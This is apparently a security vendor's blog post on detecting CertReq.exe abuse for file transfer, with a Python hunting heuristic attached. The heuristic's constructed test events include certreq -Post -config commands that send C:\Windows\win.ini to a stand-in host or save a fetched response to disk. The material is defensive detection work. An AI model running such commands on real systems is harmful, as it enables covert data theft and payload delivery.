Living off the Land binaries (Lolbins) are legitimate binaries that advanced adversaries often misuse to perform actions beyond their original purpose. Cybercriminals actively use them to download malware, to ensure persistence, for data exfiltration, for lateral movement, and more. Just yesterday we wrote about a rule that detects attacks of the Evil Corp group, which also uses Lolbins to deploy WastedLocker ransomware on the maximum number of systems in organizations.
CertReq.exe ships with Windows and its intended use is to assist with creating and installing certificates. It is not one of the Lolbins that cybercriminals exploit most heavily, but it can be used to perform malicious actions without attracting the attention of security solutions. Cybercriminals can use CertReq.exe to upload and download small files: it can upload a file via HTTP POST, or download a file via HTTP POST and either save it to disk or display its contents. You can read more about CertReq.exe exploitation here.
Den Iuzvik developed and released a new threat hunting Sigma rule that detects possible file upload/download with CertReq.exe: https://tdm.socprime.com/tdm/info/BBbpPolVZpLp/SJcgLnMBQAH5UgbBoihF/?p=1
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, ELK Stack, RSA NetWitness, Sumo Logic, Graylog, Humio, LogPoint
EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint
Tactics: Command And Control
Techniques: Remote File Copy (T1105)
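As an added illustration, and not the Sigma rule's own logic or SOC Prime's code, the Python heuristic below applies the same hunting idea to constructed process-creation events: flag certreq.exe launched with both -Post and -config and an HTTP(S) URL, and note whether an output file argument is present (the case where the response is written to disk). The -Post/-config syntax is assumed from CertReq's documented usage; the event field names and sample command lines are constructed.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real telemetry:
# a benign certificate request, an HTTP POST with one file argument, an HTTP POST with an
# extra output file, and a non-certreq process carrying the same switches.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq -new request.inf request.req"},
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq -Post -config https://example.invalid/upload C:\Windows\win.ini"},
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"CertReq.exe -Post -config http://example.invalid/p C:\Windows\win.ini C:\Users\Public\out.bin"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe -Post -config https://example.invalid"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def is_certreq_transfer(event):
    """True when the event looks like certreq.exe used for an HTTP POST transfer:
    image is certreq.exe and the command line carries -Post, -config and an http(s) URL."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("\\certreq.exe"):
        return False
    tokens = [t.lower() for t in cmd.split()]
    has_post = any(t in ("-post", "/post") for t in tokens)
    has_config = any(t in ("-config", "/config") for t in tokens)
    return has_post and has_config and URL_RE.search(cmd) is not None


def classify(event):
    """Label a matching event by its file arguments: with a second path the response is
    written to disk (download_to_disk); with only the input file it is posted and the
    response is displayed (upload_or_display). None when the event does not match."""
    if not is_certreq_transfer(event):
        return None
    tokens = event["CommandLine"].split()
    # Drop the executable name, switches and the URL; what remains are file paths.
    paths = [t for t in tokens[1:] if not t.startswith(("-", "/")) and not URL_RE.match(t)]
    return "download_to_disk" if len(paths) >= 2 else "upload_or_display"


def hunt(events):
    """Return (command line, label) for every event that matches the heuristic."""
    return [(e["CommandLine"], classify(e)) for e in events if is_certreq_transfer(e)]
```

Run over the constructed events, hunt() returns the two POST invocations and ignores the benign certificate request and the notepad.exe decoy.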